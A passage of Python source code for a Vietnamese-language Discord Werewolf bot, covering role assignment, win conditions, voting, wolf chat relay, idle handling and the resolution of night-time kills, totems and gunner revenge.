roles_to_remove |= set(VILLAGE_ROLES_ORDERED) if team_fractions[2] > 0.15: roles_to_remove |= set(NEUTRAL_ROLES_ORDERED) if len(roles_to_remove) == 0: roles_to_remove = set(roles) if team_fractions[0] < 0.25: roles_to_remove -= set(WOLF_ROLES_ORDERED) if team_fractions[1] < 0.5: roles_to_remove -= set(VILLAGE_ROLES_ORDERED) if team_fractions[2] < 0.05: roles_to_remove -= set(NEUTRAL_ROLES_ORDERED) if len(roles_to_remove) == 0: roles_to_remove = set(roles) for role in massive_role_list[:]: if role in roles_to_remove: massive_role_list.remove(role) removed_roles.append(role) break return (massive_role_list, "Có quá nhiều vai!; Đã xóa {} khỏi danh sách vai".format(', '.join(sort_roles(removed_roles)))) return (massive_role_list, '') async def assign_roles(gamemode): massive_role_list = [] gamemode_roles = get_roles(gamemode, len(session[1])) if not gamemode_roles: # Second fallback just in case gamemode_roles = get_roles('default', len(session[1])) session[6] = 'default' # Generate list of roles for role in gamemode_roles: if role in roles and role not in TEMPLATES_ORDERED: massive_role_list += [role] * gamemode_roles[role] massive_role_list, debugmessage = balance_roles(massive_role_list) if debugmessage != '': await log(2, debugmessage) if session[6].startswith('roles'): session[7] = dict((x, massive_role_list.count(x)) for x in roles if x in massive_role_list) else: session[7] = dict(gamemode_roles) random.shuffle(massive_role_list) for player in session[1]: role = massive_role_list.pop() session[1][player][1] = role if role == 'hunter': session[1][player][4].append('hunterbullet') for i in range(gamemode_roles['cursed villager'] if 'cursed villager' in gamemode_roles else 0): cursed_choices = [x for x in session[1] if get_role(x, 'role') not in\ ['wolf', 'werecrow', 'seer', 'fool'] and 'cursed' not in session[1][x][3]] if cursed_choices: cursed = random.choice(cursed_choices) session[1][cursed][3].append('cursed') for i in range(gamemode_roles['gunner'] if 'gunner' in gamemode_roles else 0): if gamemode in ['chaos', 'random']: gunner_choices = [x for x in session[1] if 'gunner' not in session[1][x][3]] else: gunner_choices = [x for x in session[1] if get_role(x, 'role') not in \ WOLF_ROLES_ORDERED + NEUTRAL_ROLES_ORDERED and 'gunner' not in session[1][x][3]] if gunner_choices: pewpew = random.choice(gunner_choices) session[1][pewpew][3].append('gunner') session[1][pewpew][4] += ['bullet'] * int(GUNNER_MULTIPLIER * len(session[1]) + 1) if gamemode == 'belunga': for player in session[1]: session[1][player][4].append('belunga_totem') async def end_game(reason, winners=None): global faftergame await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.online) if not session[0]: return session[0] = False if session[2]: if session[3][1]: session[4][1] += datetime.now() - session[3][1] else: if session[3][0]: session[4][0] += datetime.now() - session[3][0] msg = "<@{}> Game kết thúc! :smiley: Đêm kéo dài **{:02d}:{:02d}**. Ngày kéo dài **{:02d}:{:02d}**. Game kéo dài **{:02d}:{:02d}**. \ \n{}\n\n".format('> <@'.join(sort_players(session[1])), session[4][0].seconds // 60, session[4][0].seconds % 60, session[4][1].seconds // 60, session[4][1].seconds % 60, (session[4][0].seconds + session[4][1].seconds) // 60, (session[4][0].seconds + session[4][1].seconds) % 60, reason) if not winners == None: for player in session[1]: # ALTERNATE WIN CONDITIONS if session[1][player][0] and get_role(player, 'role') == 'crazed shaman': winners.append(player) winners = sort_players(winners) if len(winners) == 0: msg += "Trận hòa!" elif len(winners) == 1: msg += "Kẻ thắng cuộc là **{}**!".format(get_name(winners[0])) elif len(winners) == 2: msg += "Kẻ thắng cuộc là **{}** và **{}**! :smiley:".format(get_name(winners[0]), get_name(winners[1])) else: msg += ":smiley: Kẻ thắng cuộc là **{}**, và **{}**!".format('**, **'.join(map(get_name, winners[:-1])), get_name(winners[-1])) await client.send_message(client.get_channel(GAME_CHANNEL), msg) await log(1, "WINNERS: {}".format(winners)) players = list(session[1]) session[3] = [0, 0] session[4] = [timedelta(0), timedelta(0)] session[6] = '' session[7] = {} perms = client.get_channel(GAME_CHANNEL).overwrites_for(client.get_server(WEREWOLF_SERVER).default_role) perms.send_messages = True await client.edit_channel_permissions(client.get_channel(GAME_CHANNEL), client.get_server(WEREWOLF_SERVER).default_role, perms) for player in players: member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: await client.remove_roles(member, PLAYERS_ROLE) del session[1][player] # if faftergame: # !faftergame <command> [<parameters>] # faftergame.content.split(' ')[0] is !faftergame command = faftergame.content.split(' ')[1] parameters = ' '.join(faftergame.content.split(' ')[2:]) await commands[command][0](faftergame, parameters) faftergame = None def win_condition(): teams = {'village' : 0, 'wolf' : 0, 'neutral' : 0} injured_wolves = 0 for player in session[1]: if session[1][player][0]: if 'injured' in session[1][player][4]: if get_role(player, 'actualteam') == 'wolf' and session[1][player][1] != 'cultist': injured_wolves += 1 else: if session[1][player][1] == 'cultist': teams['village'] += 1 else: teams[roles[session[1][player][1]][0]] += 1 winners = [] win_team = '' win_lore = '' win_msg = '' if len([x for x in session[1] if session[1][x][0]]) == 0: win_lore = 'Tất cả mọi người đã chết. Ngôi làng bị bỏ hoang, phai tàn theo thời gian.:cry:' win_team = 'no win' elif teams['village'] + teams['neutral'] <= teams['wolf']: win_team = 'wolf' win_lore = 'Số dân khỏe mạnh còn sót lại bằng hoặc ít hơn số sói! Sói áp đảo dân làng và đã thống trị cả ngôi làng!.:skull:' elif len([x for x in session[1] if session[1][x][0] and get_role(x, 'role') in ACTUAL_WOLVES + ['traitor']]) == 0: # old version: teams['wolf'] == 0 and injured_wolves == 0: win_team = 'village' win_lore = 'Tất cả sói đã chết! Dân làng quyết định nướng thịt sói để ăn mừng chiến thắng cùng nhau!.:thumpsup:' else: return None for player in session[1]: if get_role(player, 'actualteam') == win_team: winners.append(player) return [win_team, win_lore + '\n\n' + end_game_stats(), winners] def end_game_stats(): role_msg = "" role_dict = {} for role in roles: role_dict[role] = [] for player in session[1]: if 'traitor' in session[1][player][4]: session[1][player][1] = 'traitor' session[1][player][4].remove('traitor') role_dict[session[1][player][1]].append(player) if 'cursed' in session[1][player][3]: role_dict['cursed villager'].append(player) if 'gunner' in session[1][player][3]: role_dict['gunner'].append(player) for key in sort_roles(role_dict): value = sort_players(role_dict[key]) if len(value) == 0: pass elif len(value) == 1: role_msg += "**{}** là **{}**. ".format(key, get_name(value[0])) elif len(value) == 2: role_msg += "**{}** là **{}** và **{}**. ".format(roles[key][1], get_name(value[0]), get_name(value[1])) else: role_msg += "**{}** là **{}**, và **{}**. ".format(roles[key][1], '**, **'.join(map(get_name, value[:-1])), get_name(value[-1])) return role_msg def get_name(player): member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: return str(member.display_name) else: return str(player) def get_player(string): string = string.lower() users = [] discriminators = [] nicks = [] users_contains = [] nicks_contains = [] for player in session[1]: if string == player.lower() or string.strip('<@!>') == player: return player member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: if member.name.lower().startswith(string): users.append(player) if string.strip('#') == member.discriminator: discriminators.append(player) if member.display_name.lower().startswith(string): nicks.append(player) if string in member.name.lower(): users_contains.append(player) if string in member.display_name.lower(): nicks_contains.append(player) elif get_player(player).lower().startswith(string): users.append(player) if len(users) == 1: return users[0] if len(discriminators) == 1: return discriminators[0] if len(nicks) == 1: return nicks[0] if len(users_contains) == 1: return users_contains[0] if len(nicks_contains) == 1: return nicks_contains[0] return None def sort_players(players): fake = [] real = [] for player in players: if client.get_server(WEREWOLF_SERVER).get_member(player): real.append(player) else: fake.append(player) return sorted(real, key=get_name) + sorted(fake, key=int) def get_role(player, level): # level: {team: reveal team only; actualteam: actual team; seen: what the player is seen as; death: role taking into account cursed and cultist and traitor; actual: actual role} ##(terminology: role = what you are, template = additional things that can be applied on top of your role) ##cursed, gunner, blessed, mayor, assassin are all templates ##so you always have exactly 1 role, but can have 0 or more templates on top of that ##revealing totem (and similar powers, like detective id) only reveal roles if player in session[1]: role = session[1][player][1] templates = session[1][player][3] if level == 'team': if roles[role][0] == 'wolf': if not role in ['cultist', 'traitor']: return "wolf" return "villager" elif level == 'actualteam': return roles[role][0] elif level == 'seen': seen_role = None if role in ROLES_SEEN_WOLF: seen_role = 'wolf' elif session[1][player][1] in ROLES_SEEN_VILLAGER: seen_role = 'villager' else: seen_role = role for template in templates: if template in ROLES_SEEN_WOLF: seen_role = 'wolf' break if template in ROLES_SEEN_VILLAGER: seen_role = 'villager' return seen_role elif level == 'death': returnstring = '' if role == 'traitor': returnstring += 'villager' else: returnstring += role return returnstring elif level == 'deathstats': returnstring = '' if role == 'traitor': returnstring += 'villager' else: returnstring += role return returnstring elif level == 'role': return role elif level == 'templates': return templates elif level == 'actual': return ' '.join(templates) + ' ' + role return None def get_roles(gamemode, players): if gamemode.startswith('roles'): role_string = ' '.join(gamemode.split(' ')[1:]) if role_string != '': gamemode_roles = {} separator = ',' if ';' in role_string: separator = ';' for role_piece in role_string.split(separator): piece = role_piece.strip() if '=' in piece: role, amount = piece.split('=') elif ':' in piece: role, amount = piece.split(':') else: return None amount = amount.strip() if amount.isdigit(): gamemode_roles[role.strip()] = int(amount) return gamemode_roles elif gamemode in gamemodes: if players in range(gamemodes[gamemode]['min_players'], gamemodes[gamemode]['max_players'] + 1): if gamemode == 'random': exit = False while not exit: exit = True available_roles = [x for x in roles if x not in TEMPLATES_ORDERED\ and x not in ('villager', 'cultist')] gamemode_roles = dict((x, 0) for x in available_roles) gamemode_roles[random.choice(ACTUAL_WOLVES)] += 1 # ensure at least 1 wolf that can kill for i in range(players - 1): gamemode_roles[random.choice(available_roles)] += 1 gamemode_roles['gunner'] = random.randrange(int(players ** 1.2 / 4)) gamemode_roles['cursed villager'] = random.randrange(int(players ** 1.2 / 3)) teams = {'village' : 0, 'wolf' : 0, 'neutral' : 0} for role in gamemode_roles: if role not in TEMPLATES_ORDERED: teams[roles[role][0]] += gamemode_roles[role] if teams['wolf'] >= teams['village'] + teams['neutral']: exit = False for role in dict(gamemode_roles): if gamemode_roles[role] == 0: del gamemode_roles[role] return gamemode_roles else: gamemode_roles = {} for role in roles: if role in gamemodes[gamemode]['roles'] and gamemodes[gamemode]['roles'][role][\ players - MIN_PLAYERS] > 0: gamemode_roles[role] = gamemodes[gamemode]['roles'][role][players - MIN_PLAYERS] return gamemode_roles return None def get_votes(totem_dict): voteable_players = [x for x in session[1] if session[1][x][0]] able_players = [x for x in voteable_players if 'injured' not in session[1][x][4]] vote_dict = {'abstain' : 0} for player in voteable_players: vote_dict[player] = 0 able_voters = [x for x in able_players if totem_dict[x] == 0] for player in able_voters: if session[1][player][2] in vote_dict: vote_dict[session[1][player][2]] += 1 if 'influence_totem' in session[1][player][4] and session[1][player][2] in vote_dict: vote_dict[session[1][player][2]] += 1 for player in [x for x in able_players if totem_dict[x] != 0]: if totem_dict[player] < 0: vote_dict['abstain'] += 1 else: for p in [x for x in voteable_players if x != player]: vote_dict[p] += 1 return vote_dict def _autocomplete(string, lst): if string in lst: return (string, 1) else: choices = [] for item in lst: if item.startswith(string): choices.append(item) if len(choices) == 1: return (choices[0], 1) else: return (choices, len(choices)) def verify_gamemode(gamemode, verbose=True): msg = '' good = True for i in range(gamemodes[gamemode]['max_players'] - gamemodes[gamemode]['min_players'] + 1): total = sum(gamemodes[gamemode]['roles'][role][i + gamemodes[gamemode]['min_players'] - MIN_PLAYERS] for role in gamemodes[gamemode]['roles']\ if role not in TEMPLATES_ORDERED) msg += str(total) if total != i + gamemodes[gamemode]['min_players'] and total != 0: good = False msg += ' - should be ' + str(i + gamemodes[gamemode]['min_players']) msg += '\n' msg = msg[:-1] if verbose: return msg else: return good def verify_gamemodes(verbose=True): msg = '' good = True for gamemode in sorted(gamemodes): msg += gamemode + '\n' result = verify_gamemode(gamemode) resultlist = result.split('\n') for i in range(len(resultlist)): if resultlist[i] != str(i + gamemodes[gamemode]['min_players']) and resultlist[i] != '0': msg += result good = False break else: msg += 'good' msg += '\n\n' if verbose: return msg else: return good async def wolfchat(message, author=''): if isinstance(message, discord.Message): author = message.author.id msg = message.content else: msg = str(message) member = client.get_server(WEREWOLF_SERVER).get_member(author) if member: athr = member.display_name else: athr = author for wolf in [x for x in session[1] if x != author and session[1][x][0] and session[1][x][1] in WOLFCHAT_ROLES and client.get_server(WEREWOLF_SERVER).get_member(x)]: try: pfx = "**-[:wolf:Wolfchat:wolf:]-**" if athr != '': pfx += " Tin nhắn từ **{}**".format(athr) await client.send_message(client.get_server(WEREWOLF_SERVER).get_member(wolf), "{}: {}".format(pfx, msg)) except discord.Forbidden: pass async def player_idle(message): while message.author.id in session[1] and not session[0]: await asyncio.sleep(1) while message.author.id in session[1] and session[0] and session[1][message.author.id][0]: def check(msg): if not message.author.id in session[1] or not session[1][message.author.id][0] or not session[0]: return True if msg.author.id == message.author.id and msg.channel.id == client.get_channel(GAME_CHANNEL).id: return True return False msg = await client.wait_for_message(author=message.author, channel=client.get_channel(GAME_CHANNEL), timeout=PLAYER_TIMEOUT, check=check) if msg == None and message.author.id in session[1] and session[0] and session[1][message.author.id][0]: await client.send_message(client.get_channel(GAME_CHANNEL), message.author.mention + "**, Bạn đã treo máy hơi lâu rồi đấy. Nói gì trong chat đi nếu không bạn sẽ bị tuyên bố đã chết!.:scream:**") try: await client.send_message(message.author, "**Bạn đã treo máy trong #" + client.get_channel(GAME_CHANNEL).name + " hơi lâu rồi đấy. Hãy nói gì đó trong chat nếu không bạn sẽ bị tuyên bố đã chết.:joy:**") except discord.Forbidden: pass msg = await client.wait_for_message(author=message.author, channel=client.get_channel(GAME_CHANNEL), timeout=PLAYER_TIMEOUT2, check=check) if msg == None and message.author.id in session[1] and session[0] and session[1][message.author.id][0]: await client.send_message(client.get_channel(GAME_CHANNEL), "**" + get_name(message.author.id) + "** Ngủ say như chết và.....chết thật :v.:joy: " "Kẻ còn sống đã chôn **" + get_role(message.author.id, 'death') + '**.') if message.author.id in stasis: stasis[message.author.id] += QUIT_GAME_STASIS else: stasis[message.author.id] = QUIT_GAME_STASIS session[1][message.author.id][0] = False try: await client.remove_roles(client.get_server(WEREWOLF_SERVER).get_member(message.author.id), PLAYERS_ROLE) except: pass await check_traitor() # await log(1, "{} ({}) IDLE OUT".format(message.author.display_name, message.author.id)) def is_online(user_id): member = client.get_server(WEREWOLF_SERVER).get_member(user_id) if member: if member.status in [discord.Status.online, discord.Status.idle]: return True return False async def check_traitor(): if not session[0] and win_condition() == None: return for other in [session[1][x][4] for x in session[1]]: if 'traitor' in other: # traitor already turned return wolf_team_alive = [x for x in session[1] if session[1][x][0] and get_role(x, 'role') in [ 'wolf', 'werecrow', 'werekitten', 'traitor']] wolf_team_no_traitors = [x for x in wolf_team_alive if get_role(x, 'role') != 'traitor'] if len(wolf_team_no_traitors) == 0: if len(wolf_team_alive) == 0: # no wolves alive; don't play traitor turn message return traitors = [x for x in session[1] if session[1][x][0] and get_role(x, 'role') == 'traitor'] await log(1, ', '.join(traitors) + " turned into wolf") for traitor in traitors: session[1][traitor][4].append('traitor') session[1][traitor][1] = 'wolf' member = client.get_server(WEREWOLF_SERVER).get_member(traitor) if member: try: await client.send_message(member, ":full_moon: HÚuuuuuuuuu...Bạn đã trở thành sói!\nĐã đến lúc báo thù cho những đồng đội đã chết! :smiling_imp:") except discord.Forbidden: pass await client.send_message(client.get_channel(GAME_CHANNEL), "**Dân làng khi đang ăn mừng chiến thắng, bỗng nghe 1 tiếng hú rợn người. Vẫn còn sói!! :scream:**") def sort_roles(role_list): role_list = list(role_list) result = [] for role in WOLF_ROLES_ORDERED + VILLAGE_ROLES_ORDERED + NEUTRAL_ROLES_ORDERED + TEMPLATES_ORDERED: result += [role] * role_list.count(role) return result async def run_game(): await client.change_presence(game=client.get_server(WEREWOLF_SERVER).me.game, status=discord.Status.dnd) session[0] = True session[2] = False if session[6] == '': vote_dict = {} for player in session[1]: vote = session[1][player][2] if vote in vote_dict: vote_dict[vote] += 1 elif vote != '': vote_dict[vote] = 1 for gamemode in vote_dict: if vote_dict[gamemode] >= len(session[1]) // 2 + 1: session[6] = gamemode break else: if datetime.now().date() == __import__('datetime').date(2017, 4, 1) or 'belunga' in globals(): session[6] = 'belunga' else: session[6] = 'default' for player in session[1]: session[1][player][1] = '' session[1][player][2] = '' perms = client.get_channel(GAME_CHANNEL).overwrites_for(client.get_server(WEREWOLF_SERVER).default_role) perms.send_messages = False await client.edit_channel_permissions(client.get_channel(GAME_CHANNEL), client.get_server(WEREWOLF_SERVER).default_role, perms) if not get_roles(session[6], len(session[1])): session[6] = 'default' # Fallback if invalid number of players for gamemode or invalid gamemode somehow for stasised in [x for x in stasis if stasis[x] > 0]: stasis[stasised] -= 1 await client.send_message(client.get_channel(GAME_CHANNEL), "<@{}>, Chào mừng tới Ma sói, 1 trò chơi nổi tiếng :smiley:. " "Đang dùng chế độ chơi **{}** với **{}** người chơi.\nTất cả người chơi kiểm tra tin nhắn từ tôi để có hướng dẫn.:joy: " "Nếu ko nhận đc tin nhắn, hãy báo {}.:scream:".format('> <@'.join(sort_players(session[1])), session[6], len(session[1]), client.get_server(WEREWOLF_SERVER).get_member(OWNER_ID).name)) await assign_roles(session[6]) await game_loop() async def game_loop(ses=None): if ses: await client.send_message(client.get_channel(GAME_CHANNEL), PLAYERS_ROLE.mention + ", Chào mừng đến game Ma sói, 1 trờ chơi phổ biến.:smiley: " "Đang dùng chế độ chơi **{}** với **{}** người chơi.\nTất cả người chơi kiểm tra tin nhắn để xem tin nhắn từ tôi.:joy: " "Nếu bạn không nhận được tin nhắn nào, hãy để {} biết.:scream:".format(session[6], len(session[1]), client.get_server(WEREWOLF_SERVER).get_member(OWNER_ID).name)) globals()['session'] = ses await log(1, str(session)) first_night = True # GAME START while win_condition() == None and session[0]: log_msg = '' for player in session[1]: member = client.get_server(WEREWOLF_SERVER).get_member(player) role = get_role(player, 'role') if role in ['shaman', 'crazed shaman'] and session[1][player][0]: if role == 'shaman': session[1][player][2] = random.choice(SHAMAN_TOTEMS) elif role == 'crazed shaman': session[1][player][2] = random.choice(list(totems)) log_msg += "{} ({}) HAS {}".format(get_name(player), player, session[1][player][2]) + '\n' elif role == 'hunter' and session[1][player][0] and 'hunterbullet' not in session[1][player][4]: session[1][player][2] = player if first_night: await _send_role_info(player) else: await _send_role_info(player, sendrole=False) await log(1, 'SUNSET LOG:\n' + log_msg) if session[3][0] == 0: first_night = False # NIGHT session[3][0] = datetime.now() await client.send_message(client.get_channel(GAME_CHANNEL), ":full_moon: Bây giờ là **ban đêm**.:full_moon:") warn = False while win_condition() == None and not session[2] and session[0]: end_night = True for player in session[1]: if session[1][player][0] and session[1][player][1] in ['wolf', 'werecrow', 'werekitten', 'sorcerer', 'seer', 'harlot', 'hunter']: end_night = end_night and (session[1][player][2] != '') if session[1][player][0] and session[1][player][1] in ['shaman', 'crazed shaman']: end_night = end_night and (session[1][player][2] in session[1]) end_night = end_night or (datetime.now() - session[3][0]).total_seconds() > NIGHT_TIMEOUT if end_night: session[2] = True session[3][1] = datetime.now() # attempted fix for using !time right as night ends if (datetime.now() - session[3][0]).total_seconds() > NIGHT_WARNING and warn == False: warn = True await client.send_message(client.get_channel(GAME_CHANNEL), "**:full_moon: Một vài dân làng dậy sớm và nhận thấy trời vẫn chưa sáng. " "Đêm thì sắp tàn mà vẫn còn có tiếng nói chuyện của dân làng.:full_moon:**") await asyncio.sleep(0.1) night_elapsed = datetime.now() - session[3][0] session[4][0] += night_elapsed # BETWEEN NIGHT AND DAY session[3][1] = datetime.now() # fixes using !time screwing stuff up killed_msg = '' killed_dict = {} for player in session[1]: killed_dict[player] = 0 killed_players = [] hunter_kill = None alive_players = sort_players(x for x in session[1] if session[1][x][0]) log_msg = "SUNRISE LOG:\n" if session[0]: for player in alive_players: role = get_role(player, 'role') if role in ['shaman', 'crazed shaman'] and session[1][player][2] in totems: totem_target = random.choice([x for x in alive_players if x != player]) totem = session[1][player][2] session[1][totem_target][4].append(totem) session[1][player][2] = totem_target log_msg += player + '\'s ' + totem + ' given to ' + totem_target + "\n" member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: try: random_given = "wtf? this is a bug; pls report to admins" if role == 'shaman': random_given = "Vì bạn quên không đưa bùa cho ai cả, **{0}** của bạn đã được ngẫu nhiên gửi đến cho **{1}**.:smiling_imp:".format( totem.replace('_', ' '), get_name(totem_target)) elif role == 'crazed shaman': random_given = "Vì bạn quên không đưa bùa cho ai, bùa đã được ngẫu nhiên gửi cho **{0}**.:smiling_imp:".format(get_name(totem_target)) await client.send_message(member, random_given) except discord.Forbidden: pass elif role == 'harlot' and session[1][player][2] == '': member = client.get_server(WEREWOLF_SERVER).get_member(player) session[1][player][2] = player log_msg += "{0} ({1}) STAY HOME".format(get_name(player), player) + "\n" if member: try: await client.send_message(member, "Bạn sẽ ở nhà đêm nay.") except discord.Forbidden: pass elif role == 'hunter' and session[1][player][2] == '': member = client.get_server(WEREWOLF_SERVER).get_member(player) session[1][player][2] = player log_msg += "{0} ({1}) PASS".format(get_name(player), player) + "\n" if member: try: await client.send_message(member, "Bạn đã chọn không giết ai tối nay.:scream:") except discord.Forbidden: pass # BELUNGA for player in [x for x in session[1] if session[1][x][0]]: for i in range(session[1][player][4].count('belunga_totem')): session[1][player][4].append(random.choice(list(totems) + ['belunga_totem', 'bullet'])) if random.random() < 0.1 and 'gunner' not in get_role(player, 'templates'): session[1][player][3].append('gunner') # Wolf kill wolf_votes = {} wolf_killed = None gunner_revenge = [] wolf_deaths = [] wolf_turn = [] for player in alive_players: if get_role(player, 'role') in ACTUAL_WOLVES: if session[1][player][2] in wolf_votes: wolf_votes[session[1][player][2]] += 1 elif session[1][player][2] != "": wolf_votes[session[1][player][2]] = 1 if wolf_votes != {}: max_votes = max([wolf_votes[x] for x in wolf_votes]) temp_players = [] for target in wolf_votes: if wolf_votes[target] == max_votes: temp_players.append(target) if len(temp_players) == 1: wolf_killed = temp_players[0] log_msg += "WOLFKILL: {} ({})".format(get_name(wolf_killed), wolf_killed) + "\n" if get_role(wolf_killed, 'role') == 'harlot' and session[1][wolf_killed][2] != wolf_killed: killed_msg += "Nạn nhân của sói không ở nhà đêm nay và né được đòn tấn công của sói.:joy:\n" else: killed_dict[wolf_killed] += 1 wolf_deaths.append(wolf_killed) # Harlot stuff for harlot in [x for x in alive_players if get_role(x, 'role') == 'harlot']: visited = session[1][harlot][2] if visited != harlot: if visited == wolf_killed and not 'protection_totem' in session[1][visited][4]: killed_dict[harlot] += 1 killed_msg += "**{}** đã chết vào đêm qua.:skull: ".format(get_name(harlot)) wolf_deaths.append(harlot) elif visited in [x for x in session[1] if get_role(x, 'role') in ACTUAL_WOLVES]: killed_dict[harlot] += 1 killed_msg += "**{}** đã chết vào đêm qua.:skull:\n".format(get_name(harlot)) wolf_deaths.append(harlot) # Hunter stuff for hunter in [x for x in session[1] if get_role(x, 'role') == 'hunter']: target = session[1][hunter][2] if target not in [hunter, '']: if 'hunterbullet' in session[1][hunter][4]: session[1][hunter][4].remove('hunterbullet') killed_dict[target] += 100 # Totem stuff totem_holders = [] protect_totemed = [] death_totemed = [] revengekill = "" for player in sort_players(session[1]): if len([x for x in session[1][player][4] if x in totems]) > 0: totem_holders.append(player) prot_tots = 0 death_tots = 0 death_tots += session[1][player][4].count('death_totem') killed_dict[player] += death_tots if get_role(player, 'role') != 'harlot' or session[1][player][2] == player: # fix for harlot with protect prot_tots = session[1][player][4].count('protection_totem') killed_dict[player] -= prot_tots if wolf_killed == player and 'protection_totem' in session[1][player][4] and killed_dict[player] < 1: protect_totemed.append(player) if 'death_totem' in session[1][player][4] and killed_dict[player] > 0 and death_tots - prot_tots > 0: death_totemed.append(player) if 'cursed_totem' in session[1][player][4]: if 'cursed' not in get_role(player, 'templates'): session[1][player][3].append('cursed') if player in wolf_deaths and killed_dict[player] > 0 and player not in death_totemed: # player was targeted and killed by wolves if session[1][player][4].count('lycanthropy_totem') > 0: killed_dict[player] = 0 wolf_turn.append(player) await wolfchat("{} is now a **wolf**!".format(get_name(player))) try: member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: await client.send_message(member, "Bạn tỉnh dậy và thấy đau nhói, bạn nhận ra bạn đã bị tấn công bởi sói :scream: " "Bùa bạn đang giữ cháy sáng :fire: , và bạn biến thành sói! :scream:") except discord.Forbidden: pass elif session[1][player][4].count('retribution_totem') > 0: revenge_targets = [x for x in session[1] if session[1][x][0] and get_role(x, 'role') in [ 'wolf', 'werecrow', 'werekitten']] if get_role(player, 'role') == 'harlot' and get_role(session[1][player][2], 'role') in [ 'wolf', 'werecrow', 'werekitten']: revenge_targets[:] = [session[1][player][2]] else: revenge_targets[:] = [x for x in revenge_targets if session[1][x][2] == wolf_killed] revengekill = random.choice(revenge_targets) killed_dict[revengekill] += 100 if killed_dict[revengekill] > 0: killed_msg += "Khi bị tấn công vào đêm qua, **{}** cầm lá bùa đang cháy sáng :fire:. Thi thể của **{}**".format( get_name(wolf_killed), get_name(revengekill)) killed_msg += ", được tìm thấy ở hiện trường.:skull:\n".format(get_role(revengekill, 'role')) other = session[1][player][4][:] for o in other[:]: # hacky way to get specific totems to last 2 nights if o in ['death_totem', 'protection_totem', 'cursed_totem', 'retribution_totem', 'lycanthropy_totem2', 'deceit_totem2']: other.remove(o) elif o == 'lycanthropy_totem': other.remove(o) other.append('lycanthropy_totem2') elif o == 'deceit_totem': other.remove(o) other.append('deceit_totem2') session[1][player][4] = other for player in sort_players(wolf_deaths): if 'gunner' in get_role(player, 'templates') and \ session[1][player][4].count('bullet') > 0 and killed_dict[player] > 0: if random.random() < GUNNER_REVENGE_WOLF: revenge_targets = [x for x in session[1] if session[1][x][0] and get_role(x, 'role') in [ 'wolf', 'werecrow', 'werekitten']] if get_role(player, 'role') == 'harlot' and get_role(session[1][player][2], 'role') in [ 'wolf', 'werecrow', 'werekitten']: revenge_targets[:] = [session[1][player][2]] else: revenge_targets[:] = [x for x in revenge_targets if session[1][x][2] == wolf_killed] revenge_targets[:] = [x for x in revenge_targets if x not in gunner_revenge] if revenge_targets: target = random.choice(revenge_targets) gunner_revenge.append(target) session[1][player][4].remove('bullet') killed_dict[target] += 100 if killed_dict[target] > 0: killed_msg += "May thay **{}** có súng và đạn nên **{}** bị bắn chết.:joy:\n".format( get_name(player), get_name(target), get_role(target, 'death')) if session[1][player][4].count('bullet') > 0: give_gun_targets = [x for x in session[1] if session[1][x][0] and get_role(x, 'role') in WOLFCHAT_ROLES] if len(give_gun_targets) > 0: give_gun = random.choice(give_gun_targets) if not 'gunner' in get_role(give_gun, 'templates'): session[1][give_gun][3].append('gunner') session[1][give_gun][4].append('bullet') member = client.get_server(WEREWOLF_SERVER).get_member(give_gun) if member: try: await client.send_message(member, "Khi đang lục lọi nhà của **{}**, bạn tìm thấy 1 khẩu súng được nạp 1 " "viên đạn bạc! Bạn chỉ có thể xài súng vào ban ngày. Nếu bạn bắn trúng sói, bạn sẽ cố tình bắt trượt. Nếu " "bạn bắn dân làng, khả năng cao là họ sẽ bị thương.".format(get_name(player))) except discord.Forbidden: pass for player in killed_dict: if killed_dict[player] > 0: killed_players.append(player) killed_players = sort_players(killed_players) for player in killed_players: member = client.get_server(WEREWOLF_SERVER).get_member(player) if member: await client.remove_roles(member, PLAYERS_ROLE) killed_temp = killed_players[:] log_msg += "PROTECT_TOTEMED: " + ", ".join("{} ({})".format(get_name(x), x) for x in protect_totemed) + "\n" log_msg += "DEATH_TOTEMED: " + ", ".join("{} ({})".format(get_name(x), x) for x in death_totemed) + "\n" log_msg += "PLAYERS TURNED WOLF: " + ", ".join("{} ({})".format(get_name(x), x) for x in wolf_turn) + "\n" if revengekill: log_msg += "RETRIBUTED: " + "{} ({})\n".format(get_name(revengekill), revengekill) if gunner_revenge: log_msg += "GUNNER_REVENGE: " + ", ".join("{} ({})".format(get_name(x), x) for x in gunner_revenge) + "\n" log_msg += "DEATHS FROM WOLF: " + ", ".join("{} ({})".format(get_name(x), x) for x in wolf_deaths) + "\n" log_msg += "KILLED PLAYERS: " + ", ".join("{} ({})".format(get_name(x), x) for x in killed_players) + "\n" await log(1, log_msg) if protect_totemed != []: for protected in sort_players(protect_totemed): killed_msg += "**{0}** bị tấn công đêm qua, nhưng lá bùa của họ đã cháy sáng :fire:, gây chói lóa kẻ sát nhân giúp họ chạy trốn.:joy:\n".format( get_name(protected)) if death_totemed != []: for ded in sort_players(death_totemed): killed_msg += "**{0}** giữ một lá bùa đang bùng cháy :fire:. Thi thể của **{0}** được phát hiện tại hiện trường.:skull:\n".format( get_name(ded), get_role(ded, 'death')) killed_players.remove(ded) if revengekill != "" and revengekill in killed_players: # retribution totem killed_players.remove(revengekill) for player in gunner_revenge: if player in killed_players: killed_players.remove(player) if len(killed_players) == 0: if protect_totemed == [] and death_totemed == [] and get_role(wolf_killed, 'role') != 'harlot': killed_msg += random.choice(lang['nokills']) + '\n' elif len(killed_players) == 1: killed_msg += ":skull: Thi thể của **{}** được phát hiện. Ai nấy đều xót xa.:cry:\n".format(get_name(killed_players[0]), get_role(killed_players[0], 'death')) else: killed_msg += ":skull: Thi thể của **{}**, và **{}** được tìm thấy. Dân làng than khóc.:cry:\n".format( '**, **'.join(get_name(x) + '**,' + get_role(x, 'death') for x in killed_players[:-1]), get_name(killed_players[-1]), get_role(killed_players[-1], 'death')) if session[0] and win_condition() == None: await client.send_message(client.get_channel(GAME_CHANNEL), ":full_moon: Đêm tối dài **{0:02d}:{1:02d}**. Dân làng thức dậy và tìm kiếm khắp làng.\n\n{2}".format( night_elapsed.seconds // 60, night_elapsed.seconds % 60, killed_msg)) if session[0] and win_condition() == None: totem_holders = sort_players(totem_holders) if len(totem_holders) == 0: pass elif len(totem_holders) == 1: await client.send_message(client.get_channel(GAME_CHANNEL), random.choice(lang['hastotem']).format(get_name(totem_holders[0]))) elif len(totem_holders) == 2: await client.send_message(client.get_channel(GAME_CHANNEL), 